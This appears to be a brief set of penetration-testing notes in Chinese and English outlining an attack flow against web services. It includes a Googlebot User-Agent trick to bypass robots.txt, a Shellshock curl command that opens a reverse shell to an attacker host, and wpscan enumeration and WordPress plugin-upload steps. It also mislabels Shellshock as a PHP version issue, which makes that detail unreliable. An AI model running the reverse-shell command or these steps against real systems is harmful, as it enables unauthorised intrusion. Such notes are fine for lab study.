攻擊流程:

1. 找出對方有開啟什麼服務
2. 檢查人家架設的服務有沒有可利用的已知漏洞
3. 利用漏洞，想辦法拿到 Shell

Web Service

Apache

Robots.txt : Bypass robots.txt “You are not a search engine. Permission denied.”

1

User-Agent: Googlebot/2.1 (+http://www.googlebot.com/bot.html)

cgi-bin

• ShellShock PHP < 5.6.2

  curl -H 'User-Agent: () { :; }; /bin/bash -i >& /dev/tcp/ATTACKER IP/PORT 0>&1' http://VICTOM/cgi-bin/admin.cgi

Wordpress

• WordPress Security Scanner

  1	wpscan --url sandbox.local --enumerate ap,at,cb,dbe

• Admin permission

  • WordPress receives the zip file, it will extract it into the wp-content/plugins